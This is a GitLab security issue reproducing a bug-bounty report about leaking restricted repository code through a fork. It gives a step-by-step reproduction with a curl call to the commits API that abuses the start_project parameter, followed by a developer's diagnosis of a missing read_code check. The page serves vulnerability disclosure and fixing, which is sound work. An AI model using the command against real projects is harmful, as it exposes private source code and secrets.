Skip to content

Leaking source code of restricted project through a fork

Please read the process on how to fix security issues before starting to work on the issue. Vulnerabilities must be fixed in a security mirror.

HackerOne report #2027967 by shells3c on 2023-06-15, assigned to @ottilia_westerlund:

Report | How To Reproduce

Report

Summary

The codebase of any project that has Repository visibility set to Only Project Members can be leaked if it has a fork out there

Steps to reproduce
  1. Victim account creates a public project
  2. Attacker account forks this project
  3. Victim account sets the Repository visibility of the project to Only Project Members, and then creates a file, let's say secret.txt with some secret inside it
  4. As the attacker, execute this command
curl --request POST \  
     --form "start_project=<victim_project_id>" \  
     --form "branch=steal" \  
     --form "commit_message=some commit message" \  
     --form "start_branch=<victim_project_branch>" \  
     --form "actions[][action]=create" \  
     --form "actions[][file_path]=foo" \  
     --form "actions[][content]=bar" \  
     --header "PRIVATE-TOKEN: <attacker_access_token>" \  
     "https://gitlab.com/api/v4/projects/<attacker_project_id>/repository/commits"

with:

  • <attacker_access_token> is the access token of the attacker account
  • <attacker_project_id> is the project ID or URL-encoded path of the attacker project, which is the fork
  • <victim_project_id> is the project ID or URL-encoded path of the victim project
  • <victim_project_branch> is the branch that you want to steal the code from. In this test, you can use main
  1. Attacker account visits the fork, switches to branch steal to read secret.txt
Output of checks

This bug happens on GitLab.com

Impact

Disclosure of restricted project's source code by using a fork

Investigation (by @vyaklushin)

Here we verify that the user has an access to the project, but we don't check if the user has access to the code.

We do read_project check -> which is successful, but we don't do a read_code check that necessary to ensure if the code is accessible.

A validation like this one should help.

can?(current_user, :read_code, start_project)

We should also check user permissions in Files::MultiService to prevent this bug from appearing again.

How To Reproduce

Please add reproducibility information to this section:

Edited by Vasilii Iakliushin